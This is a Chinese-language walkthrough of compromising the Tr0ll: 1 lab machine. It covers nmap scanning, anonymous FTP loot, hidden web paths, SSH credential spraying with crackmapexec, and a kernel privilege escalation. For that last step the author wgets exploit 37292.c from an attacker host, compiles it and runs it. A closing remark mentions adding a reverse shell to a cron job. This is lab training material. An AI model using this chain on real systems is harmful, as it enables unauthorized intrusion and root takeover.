Tr0ll: 1
主机发现端口扫描
探测存活主机,
154为靶机1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17nmap -sP 192.168.75.0/24
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-27 08:50 CST
Nmap scan report for 192.168.75.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00032s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.154
Host is up (0.00033s latency).
MAC Address: 00:0C:29:39:E9:62 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.000079s latency).
MAC Address: 00:50:56:FB:E7:F4 (VMware)
Nmap scan report for 192.168.75.151
Host is up.扫描主机所有端口
1
2
3
4
5
6
7
8
9
10
11nmap -sT -min-rate 10000 -p- 192.168.75.154
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-27 08:50 CST
Nmap scan report for 192.168.75.154
Host is up (0.0018s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:39:E9:62 (VMware扫描服务版本及系统版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18nmap -sT -sV -O -p21,22,80 192.168.75.154
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-27 08:51 CST
Nmap scan report for 192.168.75.154
Host is up (0.0026s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:39:E9:62 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel扫描漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30nmap -script=vuln -p21,22,80 192.168.75.154
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-27 08:52 CST
Nmap scan report for 192.168.75.154
Host is up (0.00081s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /robots.txt: Robots file
|_ /secret/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:39:E9:62 (VMware)
FTP
使用匿名用户登录
存在一个pcap文件,使用wireshark打开,观察此文件
应该是存在一个
secret_stuff.txt文件找到传输
secret_stuff.txt的数据包,能看到明文内容
1
2Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol
Sucks, you were so close... gotta TRY HARDER!信息:
sup3rs3cr3tdirlol可能很重要
web渗透
访问主页
翻译过来是:
嘿,非hacker。问题?FTP获取到的信息
sup3rs3cr3tdirlol尝试访问/sup3rs3cr3tdirlol存在文件roflmao,下载下载使用notepad打开提示:
Find address 0x0856BF to proceed,文件头是elf文件,是linux下的可执行文件使用
010Editor找不到这个地址,尝试在url操作,访问成功 6来到
/0x0856BF,存在几个文本文件1
2
3
4
5
6
7
8
9
10
11## /good_luck/which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow1
2##/this_folder_contains_the_password/Pass.txt
Good_job_:)是账号密码,靶机扫描出了
22端口,所以应该尝试ssh登录,但是web上还有一些让人感兴趣的路径没访问(别访问了,给你来一句U MAD?)尝试SSH登录
我一个一个试没事出来,别学我可以使用命令
1
crackmapexec ssh 192.168.75.154 -u which_one_lol.txt -p Pass.txt --continue-on-success
依旧没破解出来,密码真的是
Good_job_:)吗?有没有可能是Pass.txtoverflow + Pass.txt成功登录
提权
查看权限
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23$ whoami
overflow
//
$ sudo -
[sudo] password for overflow:
Sorry, user overflow may not run sudo on troll.
//
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:39:e9:62 brd ff:ff:ff:ff:ff:ff
inet 192.168.75.154/24 brd 192.168.75.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe39:e962/64 scope link
valid_lft forever preferred_lft forever
//
$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux不一会root给我踢出来了,感觉有定时任务,但我没找到,因为不给访问
1
2
3
4
5
6
7Broadcast Message from root@trol
(somewhere) at 19:15 ...
TIMES UP LOL!
Connection to 192.168.75.154 closed by remote host.
Connection to 192.168.75.154 closed.别的方法尝试了,最后尝试内核漏洞
1
2
3
4
5
6
7
8
9
10searchsploit 3.13.0
//
----------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privileg | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privileg | linux/local/37293.txt
Unified Remote 3.13.0 - Remote Code Execution (RCE) | windows/remote/51309.py
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results将
37292.c拉取下来,然后打开服务器方便靶机下载1
2
3
4cd /tmp
wget http://192.168.75.151/37292.c
gcc 37292.c -o 37292
./37292获得root
1
2whoami
root
思路
直接讲提权,登陆一会被root弹出去肯定是存在crontab定时任务的,但是因为我cat /etc/crontab被权限拒绝后就停止这个思路了,查看红队笔记WP,寻找cronlog这种模糊字样最后找到定时任务,最后追加反弹shell代码即可